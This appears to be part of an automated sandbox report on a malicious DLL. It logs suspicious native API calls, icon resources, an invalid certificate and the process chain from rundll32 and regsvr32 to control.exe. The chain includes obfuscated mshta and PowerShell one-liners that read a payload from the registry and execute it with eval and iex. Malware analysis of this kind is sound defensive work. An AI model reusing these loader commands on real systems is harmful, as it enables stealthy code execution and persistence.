          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04ABCFE8 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,4_2_04ABCFE8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AC4FEA NtWriteVirtualMemory,VirtualProtectEx,RtlNtStatusToDosError,SetLastError,4_2_04AC4FEA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04ABC0B8 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,4_2_04ABC0B8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AAB8F7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,4_2_04AAB8F7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AAC0CF memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,4_2_04AAC0CF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AAD049 NtGetContextThread,RtlNtStatusToDosError,4_2_04AAD049
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AB09CA NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,4_2_04AB09CA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B96C06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,5_2_02B96C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B965B4 NtMapViewOfSection,5_2_02B965B4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B97562 GetProcAddress,NtCreateSection,memset,5_2_02B97562
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B9B2A9 NtQueryVirtualMemory,5_2_02B9B2A9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BF0ABA NtProtectVirtualMemory,5_2_02BF0ABA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BF08B7 NtAllocateVirtualMemory,5_2_02BF08B7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BF0880 NtAllocateVirtualMemory,5_2_02BF0880
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C44582 NtQueryInformationProcess,5_2_04C44582
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C24D95 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,5_2_04C24D95
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C2D551 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,5_2_04C2D551
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C3C51B memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,5_2_04C3C51B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C23EB7 NtMapViewOfSection,5_2_04C23EB7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C31635 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,5_2_04C31635
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C3963A GetProcAddress,NtCreateSection,memset,5_2_04C3963A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C467CD GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,5_2_04C467CD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C44FEA NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,5_2_04C44FEA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C2B0A5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,5_2_04C2B0A5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C309CA NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,5_2_04C309CA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C3D9F4 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,5_2_04C3D9F4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C42CA5 memset,NtQueryInformationProcess,5_2_04C42CA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C29690 NtQuerySystemInformation,RtlNtStatusToDosError,5_2_04C29690
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C27E6C NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,5_2_04C27E6C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C3CFE8 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,5_2_04C3CFE8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C2C0CF memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,5_2_04C2C0CF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C2B8F7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,5_2_04C2B8F7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C3C0B8 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,5_2_04C3C0B8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C2D049 NtGetContextThread,RtlNtStatusToDosError,5_2_04C2D049
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E2F83C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,42_2_00E2F83C
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E1617C NtAllocateVirtualMemory,42_2_00E1617C
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E22B88 NtWriteVirtualMemory,42_2_00E22B88
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E334E4 NtQueryInformationProcess,42_2_00E334E4
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E32CC4 NtMapViewOfSection,42_2_00E32CC4
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E1EC38 NtReadVirtualMemory,42_2_00E1EC38
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E1EDFC NtQueryInformationToken,NtQueryInformationToken,NtClose,42_2_00E1EDFC
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E3B524 RtlAllocateHeap,NtQueryInformationProcess,RtlDeleteBoundaryDescriptor,42_2_00E3B524
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E2CF2C NtCreateSection,42_2_00E2CF2C
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E55027 NtProtectVirtualMemory,NtProtectVirtualMemory,42_2_00E55027
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E1F83C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,43_2_00E1F83C
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E0617C NtAllocateVirtualMemory,43_2_00E0617C
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E12B88 NtWriteVirtualMemory,43_2_00E12B88
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E234E4 NtQueryInformationProcess,43_2_00E234E4
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E22CC4 NtMapViewOfSection,43_2_00E22CC4
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E0EC38 NtReadVirtualMemory,43_2_00E0EC38
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E0EDFC NtQueryInformationToken,NtQueryInformationToken,NtClose,43_2_00E0EDFC
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E2B524 RtlAllocateHeap,NtQueryInformationProcess,RtlDeleteBoundaryDescriptor,43_2_00E2B524
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E1CF2C NtCreateSection,43_2_00E1CF2C
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E45003 NtProtectVirtualMemory,NtProtectVirtualMemory,43_2_00E45003
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083F83C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,45_2_0083F83C
          Source: C:\Windows\System32\control.exeCode function: 45_2_0082617C NtAllocateVirtualMemory,45_2_0082617C
          Source: C:\Windows\System32\control.exeCode function: 45_2_00832B88 NtWriteVirtualMemory,45_2_00832B88
          Source: C:\Windows\System32\control.exeCode function: 45_2_00842CC4 NtMapViewOfSection,45_2_00842CC4
          Source: C:\Windows\System32\control.exeCode function: 45_2_008434E4 NtQueryInformationProcess,45_2_008434E4
          Source: C:\Windows\System32\control.exeCode function: 45_2_0082EC38 NtReadVirtualMemory,45_2_0082EC38
          Source: C:\Windows\System32\control.exeCode function: 45_2_0082EDFC NtQueryInformationToken,NtQueryInformationToken,NtClose,45_2_0082EDFC
          Source: C:\Windows\System32\control.exeCode function: 45_2_0084B524 RtlAllocateHeap,NtQueryInformationProcess,RtlDeleteBoundaryDescriptor,45_2_0084B524
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083CF2C NtCreateSection,45_2_0083CF2C
          Source: C:\Windows\System32\control.exeCode function: 45_2_00865003 NtProtectVirtualMemory,NtProtectVirtualMemory,45_2_00865003
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 61b85f75e6a7c.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
          Source: 61b85f75e6a7c.dllStatic PE information: invalid certificate
          Source: 61b85f75e6a7c.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll"
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61b85f75e6a7c.dll
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\61b85f75e6a7c.dll,DllRegisterServer
          Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gxum='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gxum).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
          Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
          Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Acrf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acrf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
          Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sou4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sou4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES391B.tmp" "c:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4531.tmp" "c:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP"
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5221.tmp" "c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5A7E.tmp" "c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP"
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61b85f75e6a7c.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\61b85f75e6a7c.dll,DllRegisterServerJump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
